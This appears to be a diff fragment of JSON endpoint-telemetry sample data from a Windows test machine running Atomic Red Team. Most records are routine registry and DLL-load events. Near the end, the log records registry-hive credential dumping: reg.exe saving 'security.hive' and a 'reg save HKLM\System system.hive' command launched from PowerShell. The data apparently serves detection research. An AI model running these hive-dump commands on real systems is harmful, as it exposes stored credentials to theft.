"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.ApplicationModel.Background.TimeBroker.dll", + "image_path": "C:\\Windows\\System32\\Windows.ApplicationModel.Background.TimeBroker.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{8bc39637-a766-42a2-9fda-9233ca603049}", + "registry_value": "{8bc39637-a766-42a2-9fda-9233ca603049}", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{9d5ff1f4-87b5-45eb-b329-50153c699baf}", + "registry_value": "{9d5ff1f4-87b5-45eb-b329-50153c699baf}", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", 
+ "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.ApplicationModel.Background.SystemEventsBroker.dll", + "image_path": "C:\\Windows\\System32\\Windows.ApplicationModel.Background.SystemEventsBroker.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "process", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "subtype": "terminate", + "timestamp": 131883571692460000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", + "registry_value": "HostActivityManager", + "timestamp": 131883571692460000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows 
NT\\CurrentVersion\\HostActivityManager\\Volatile", + "registry_value": "Volatile", + "timestamp": 131883571692460000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571749180000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571749180000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571749180000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "file", + "file_name": "REGC0BC.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGC0BC.tmp", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "file", + "file_name": "REGC0BC.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGC0BC.tmp", + "pid": 6700, + "process_name": "reg.exe", + 
"process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "file", + "file_name": "security.hive", + "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\security.hive", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "process", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571774800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "process", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\System system.hive\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3020, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + 
"subtype": "create", + "timestamp": 131883571775030000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3020, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571774950016, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "command_line": "reg save HKLM\\System system.hive", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": 
"C:\\Windows\\System32\\cmd.exe", + "pid": 2008, + "ppid": 3020, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571775150000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}", + "unique_ppid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 